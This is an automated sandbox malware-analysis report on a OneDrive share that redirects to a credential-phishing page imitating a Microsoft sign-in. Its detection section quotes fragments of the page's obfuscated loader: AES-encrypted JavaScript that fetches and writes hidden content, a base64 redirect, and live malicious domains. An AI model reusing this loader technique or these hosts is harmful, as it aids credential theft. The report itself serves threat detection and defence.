Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://hidrotehnik-my.sharepoint.com/:f:/g/personal/urska_zupanc-lasic_hidrotehnik_si/Epu6BB7ILDFNjIQbbTEGSdMBLt3x-_NWBd96WDl7UarhTQ?e=idcQMg

Overview

General Information

Sample URL:https://hidrotehnik-my.sharepoint.com/:f:/g/personal/urska_zupanc-lasic_hidrotehnik_si/Epu6BB7ILDFNjIQbbTEGSdMBLt3x-_NWBd96WDl7UarhTQ?e=idcQMg
Analysis ID:1512448
Infos:

Detection

HTMLPhisher
Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Yara detected HtmlPhish70
HTML page contains hidden URLs
HTML page contains suspicious javascript code
Phishing site or detected (based on various text indicators)
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)
HTML body contains low number of good links
HTML body with high number of embedded images detected
HTML page contains hidden javascript code
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 5688 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://hidrotehnik-my.sharepoint.com/:f:/g/personal/urska_zupanc-lasic_hidrotehnik_si/Epu6BB7ILDFNjIQbbTEGSdMBLt3x-_NWBd96WDl7UarhTQ?e=idcQMg MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6496 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1920,i,1409574036317391059,11007841498449665428,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
SourceRuleDescriptionAuthorStrings
dropped/chromecache_603JoeSecurity_HtmlPhish_70Yara detected HtmlPhish_70Joe Security
    No Sigma rule has matched
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results

    Phishing

    barindex
    Source: https://payment-to-your-bank-urska-zupanc-lasic-hidrotehnik-si.dynamictooilngsolutionsinc.com/LLM: Score: 10 Reasons: The URL does not match the legitimate domain name associated with Microsoft, and the domain 'dynamictooilngsolutionsinc.com' is not associated with Microsoft. The presence of a sign-in form and the 'Next' button suggests that the webpage is designed to trick users into entering their login credentials. DOM: 100.7.pages.csv
    Source: Yara matchFile source: dropped/chromecache_603, type: DROPPED
    Source: https://payment-to-your-bank-urska-zupanc-lasic-hidrotehnik-si.dynamictooilngsolutionsinc.com/HTTP Parser: https://ponnet.msk.su///9155.php
    Source: https://payment-to-your-bank-urska-zupanc-lasic-hidrotehnik-si.dynamictooilngsolutionsinc.com/HTTP Parser: window.location.href = atob(
    Source: Chrome DOM: 0.4OCR Text: dj Hidrotehnik OneDrive Download Copy to Sart X 1 selected Details My files > dobavitelji > PAYMENT Modified Modified By File size v Sharing Name v Activity e IJrka Zupanc Lasit -CLICK HERE TO REVIEW.url 4 hours ego 1 18 bytes shared
    Source: Chrome DOM: 0.2OCR Text: Download Sart Details My files dobavitelji PAYMENT c Activity Name Modified Modified By File size Sharing IJrka Zupanc Lasit CLICK HERE TO REVIEW.url 4 hours ago 1 18 bytes Shared
    Source: Chrome DOM: 0.3OCR Text: dj Hidrotehnik OneDrive Download Sort v El Details My files > dobavitelji > PAYMENT Activity Name v Modified Modified By File size v Sharing IJrka Zupanc Lasit -CLICK HERE TO REVIEW.url 4 hours ago 1 18 bytes shared
    Source: https://payment-to-your-bank-urska-zupanc-lasic-hidrotehnik-si.dynamictooilngsolutionsinc.com/HTTP Parser: async function ultra(laconic) { <!-- <span>every road leads to a story waiting to unfold.</span> --> var {a,b,c,d} = json.parse(laconic); return cryptojs.aes.decrypt(a, cryptojs.pbkdf2(cryptojs.enc.hex.parse(d), cryptojs.enc.hex.parse(b), {hasher: cryptojs.algo.sha512, keysize: 64/8, iterations: 999}), {iv: cryptojs.enc.hex.parse(c)}).tostring(cryptojs.enc.utf8); } async function xenon() {raccoon.hidden = 0;backdrop.hidden = 1; document.write(await ultra(await (await fetch(await ultra(atob(`eyjhijoiekjnv2y5dnnnewfkd0vjcvpfbzu0ukdnbk5kwwnhs3bfbjzowjr4anjjqt0ilcjjijoizjfhngriotdmnthhzjixztdimjzmzjjjytbjzdbhndeilcjiijoiyjnhyzlmnme4ytniywfkndyxndm3ntk1ztfizwvmzgexndyzngi4zgzingq3mzixytmzmthlyjvlzgyxntjhmdbmzjbiodqzzgm2ywzjzda4ymuzowywodg0mduwngfkzjdkzjy4ngvinwuxodziowvkmjhjyzmwyzm2mdc4njbmowjlm2q4owrjotg5ytc5y2m2mgrkmzhkmzbmmjk0mdmxndhmmgezndy3zdhizmniotqzzmflyweyodgwzdziy2iyzdy5nmq5oge5oge3nty0oddhnzfhnmjiotczzwyyzje3y2u4ywm2ywy5nzfindewndkwmjninjq2ntljmteyytkzmtq2mwnlo...
    Source: https://payment-to-your-bank-urska-zupanc-lasic-hidrotehnik-si.dynamictooilngsolutionsinc.com/HTTP Parser: Number of links: 0
    Source: https://payment-to-your-bank-urska-zupanc-lasic-hidrotehnik-si.dynamictooilngsolutionsinc.com/HTTP Parser: Total embedded image size: 45708
    Source: https://payment-to-your-bank-urska-zupanc-lasic-hidrotehnik-si.dynamictooilngsolutionsinc.com/HTTP Parser: Base64 decoded: {"a":"zBMWf9vsgyadwEIqZEo54RGMnNdYcGKpEn6hZ4xjrIA=","c":"f1a4db97f58af21e7b26ff2ca0cd0a41","b":"b3ac9f6a8a3baad461437595e1beefda14634b8dfb4d7321a3318eb5edf152a00ff0b843dc6afcd08be39f08840504adf7df684eb5e186b9ed28cc30c3607860f9be3d89dc989a79cc60dd38d30f294...
    Source: https://payment-to-your-bank-urska-zupanc-lasic-hidrotehnik-si.dynamictooilngsolutionsinc.com/HTTP Parser: No favicon
    Source: https://payment-to-your-bank-urska-zupanc-lasic-hidrotehnik-si.dynamictooilngsolutionsinc.com/HTTP Parser: No favicon
    Source: https://payment-to-your-bank-urska-zupanc-lasic-hidrotehnik-si.dynamictooilngsolutionsinc.com/HTTP Parser: No <meta name="author".. found
    Source: https://payment-to-your-bank-urska-zupanc-lasic-hidrotehnik-si.dynamictooilngsolutionsinc.com/HTTP Parser: No <meta name="copyright".. found
    Source: unknownHTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.16:49874 version: TLS 1.2
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
    Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
    Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
    Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
    Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
    Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
    Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
    Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
    Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
    Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
    Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
    Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
    Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
    Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
    Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
    Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
    Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficDNS traffic detected: DNS query: hidrotehnik-my.sharepoint.com
    Source: global trafficDNS traffic detected: DNS query: www.google.com
    Source: global trafficDNS traffic detected: DNS query: spo.nel.measure.office.net
    Source: global trafficDNS traffic detected: DNS query: westeurope0-2.pushnp.svc.ms
    Source: global trafficDNS traffic detected: DNS query: hidrotehnik.sharepoint.com
    Source: global trafficDNS traffic detected: DNS query: r4.res.office365.com
    Source: global trafficDNS traffic detected: DNS query: config.fp.measure.office.com
    Source: global trafficDNS traffic detected: DNS query: 193605544189c6806a9844be385b4211.fp.measure.office.com
    Source: global trafficDNS traffic detected: DNS query: acdc-direct.office.com
    Source: global trafficDNS traffic detected: DNS query: payment-to-your-bank-urska-zupanc-lasic-hidrotehnik-si.dynamictooilngsolutionsinc.com
    Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: upload.fp.measure.office.com
    Source: global trafficDNS traffic detected: DNS query: ponnet.msk.su
    Source: global trafficDNS traffic detected: DNS query: code.jquery.com
    Source: global trafficDNS traffic detected: DNS query: m365cdn.nel.measure.office.net
    Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
    Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50060
    Source: unknownNetwork traffic detected: HTTP traffic on port 50068 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50106
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
    Source: unknownNetwork traffic detected: HTTP traffic on port 50085 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50108
    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50107
    Source: unknownNetwork traffic detected: HTTP traffic on port 50060 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50185
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50067
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50100
    Source: unknownNetwork traffic detected: HTTP traffic on port 50077 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50068
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50189
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50191
    Source: unknownNetwork traffic detected: HTTP traffic on port 50107 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50073
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
    Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
    Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50076
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50078
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50111
    Source: unknownNetwork traffic detected: HTTP traffic on port 50189 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50199
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50077
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50110
    Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50076 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50112
    Source: unknownNetwork traffic detected: HTTP traffic on port 50096 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50108 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50073 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50085
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50084
    Source: unknownNetwork traffic detected: HTTP traffic on port 50043 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
    Source: unknownNetwork traffic detected: HTTP traffic on port 50100 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
    Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50087
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50089
    Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50111 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50096
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
    Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50097
    Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
    Source: unknownNetwork traffic detected: HTTP traffic on port 50112 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50078 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50106 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
    Source: unknownNetwork traffic detected: HTTP traffic on port 50087 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
    Source: unknownNetwork traffic detected: HTTP traffic on port 50155 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50084 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50191 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50155
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
    Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50110 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
    Source: unknownNetwork traffic detected: HTTP traffic on port 50089 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50043
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
    Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50097 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
    Source: unknownNetwork traffic detected: HTTP traffic on port 50185 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50199 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
    Source: unknownHTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.16:49874 version: TLS 1.2
    Source: classification engineClassification label: mal72.phis.win@14/243@62/132
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://hidrotehnik-my.sharepoint.com/:f:/g/personal/urska_zupanc-lasic_hidrotehnik_si/Epu6BB7ILDFNjIQbbTEGSdMBLt3x-_NWBd96WDl7UarhTQ?e=idcQMg
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1920,i,1409574036317391059,11007841498449665428,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1920,i,1409574036317391059,11007841498449665428,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity Information1
    Scripting
    Valid AccountsWindows Management Instrumentation1
    Scripting
    1
    Process Injection
    1
    Masquerading
    OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System2
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/Job1
    Registry Run Keys / Startup Folder
    1
    Registry Run Keys / Startup Folder
    1
    Process Injection
    LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
    Non-Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
    Deobfuscate/Decode Files or Information
    Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
    Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    https://hidrotehnik-my.sharepoint.com/:f:/g/personal/urska_zupanc-lasic_hidrotehnik_si/Epu6BB7ILDFNjIQbbTEGSdMBLt3x-_NWBd96WDl7UarhTQ?e=idcQMg0%Avira URL Cloudsafe
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    about:blank0%Avira URL Cloudsafe
    NameIPActiveMaliciousAntivirus DetectionReputation
    189925-ipv4v6.farm.dprodmgd104.aa-rt.sharepoint.com
    52.105.62.55
    truefalse
      unknown
      dual-spo-0005.spo-msedge.net
      13.107.136.10
      truefalse
        unknown
        ponnet.msk.su
        188.114.96.3
        truetrue
          unknown
          a.nel.cloudflare.com
          35.190.80.1
          truefalse
            unknown
            code.jquery.com
            151.101.2.137
            truefalse
              unknown
              cdnjs.cloudflare.com
              104.17.24.14
              truefalse
                unknown
                challenges.cloudflare.com
                104.18.94.41
                truefalse
                  unknown
                  www.google.com
                  142.250.185.196
                  truefalse
                    unknown
                    HHN-efz.ms-acdc.office.com
                    52.98.171.242
                    truefalse
                      unknown
                      FRA-efz.ms-acdc.office.com
                      40.99.149.146
                      truefalse
                        unknown
                        payment-to-your-bank-urska-zupanc-lasic-hidrotehnik-si.dynamictooilngsolutionsinc.com
                        172.67.164.13
                        truefalse
                          unknown
                          r4.res.office365.com
                          unknown
                          unknownfalse
                            unknown
                            hidrotehnik.sharepoint.com
                            unknown
                            unknownfalse
                              unknown
                              m365cdn.nel.measure.office.net
                              unknown
                              unknownfalse
                                unknown
                                spo.nel.measure.office.net
                                unknown
                                unknownfalse
                                  unknown
                                  hidrotehnik-my.sharepoint.com
                                  unknown
                                  unknownfalse
                                    unknown
                                    193605544189c6806a9844be385b4211.fp.measure.office.com
                                    unknown
                                    unknownfalse
                                      unknown
                                      upload.fp.measure.office.com
                                      unknown
                                      unknownfalse
                                        unknown
                                        config.fp.measure.office.com
                                        unknown
                                        unknownfalse
                                          unknown
                                          acdc-direct.office.com
                                          unknown
                                          unknownfalse
                                            unknown
                                            westeurope0-2.pushnp.svc.ms
                                            unknown
                                            unknownfalse
                                              unknown
                                              NameMaliciousAntivirus DetectionReputation
                                              https://hidrotehnik-my.sharepoint.com/personal/urska_zupanc-lasic_hidrotehnik_si/_layouts/15/onedrive.aspx?id=%2Fpersonal%2Furska%5Fzupanc%2Dlasic%5Fhidrotehnik%5Fsi%2FDocuments%2Fdobavitelji%2FPAYMENT&ga=1false
                                                unknown
                                                https://payment-to-your-bank-urska-zupanc-lasic-hidrotehnik-si.dynamictooilngsolutionsinc.com/true
                                                  unknown
                                                  about:blankfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs
                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  13.107.136.10
                                                  dual-spo-0005.spo-msedge.netUnited States
                                                  8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                  40.99.149.146
                                                  FRA-efz.ms-acdc.office.comUnited States
                                                  8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                  52.98.171.242
                                                  HHN-efz.ms-acdc.office.comUnited States
                                                  8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                  104.18.94.41
                                                  challenges.cloudflare.comUnited States
                                                  13335CLOUDFLARENETUSfalse
                                                  52.97.202.18
                                                  unknownUnited States
                                                  8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                  151.101.130.137
                                                  unknownUnited States
                                                  54113FASTLYUSfalse
                                                  52.97.186.98
                                                  unknownUnited States
                                                  8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                  23.57.23.230
                                                  unknownUnited States
                                                  16625AKAMAI-ASUSfalse
                                                  172.67.164.13
                                                  payment-to-your-bank-urska-zupanc-lasic-hidrotehnik-si.dynamictooilngsolutionsinc.comUnited States
                                                  13335CLOUDFLARENETUSfalse
                                                  23.38.98.78
                                                  unknownUnited States
                                                  16625AKAMAI-ASUSfalse
                                                  13.89.178.26
                                                  unknownUnited States
                                                  8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                  35.190.80.1
                                                  a.nel.cloudflare.comUnited States
                                                  15169GOOGLEUSfalse
                                                  142.250.184.206
                                                  unknownUnited States
                                                  15169GOOGLEUSfalse
                                                  142.250.184.195
                                                  unknownUnited States
                                                  15169GOOGLEUSfalse
                                                  104.17.24.14
                                                  cdnjs.cloudflare.comUnited States
                                                  13335CLOUDFLARENETUSfalse
                                                  52.105.62.55
                                                  189925-ipv4v6.farm.dprodmgd104.aa-rt.sharepoint.comUnited States
                                                  8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                  23.38.98.116
                                                  unknownUnited States
                                                  16625AKAMAI-ASUSfalse
                                                  23.38.98.115
                                                  unknownUnited States
                                                  16625AKAMAI-ASUSfalse
                                                  74.125.71.84
                                                  unknownUnited States
                                                  15169GOOGLEUSfalse
                                                  104.18.95.41
                                                  unknownUnited States
                                                  13335CLOUDFLARENETUSfalse
                                                  20.189.173.24
                                                  unknownUnited States
                                                  8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                  13.107.6.163
                                                  unknownUnited States
                                                  8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                  151.101.2.137
                                                  code.jquery.comUnited States
                                                  54113FASTLYUSfalse
                                                  20.50.73.13
                                                  unknownUnited States
                                                  8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                  239.255.255.250
                                                  unknownReserved
                                                  unknownunknownfalse
                                                  142.250.185.196
                                                  www.google.comUnited States
                                                  15169GOOGLEUSfalse
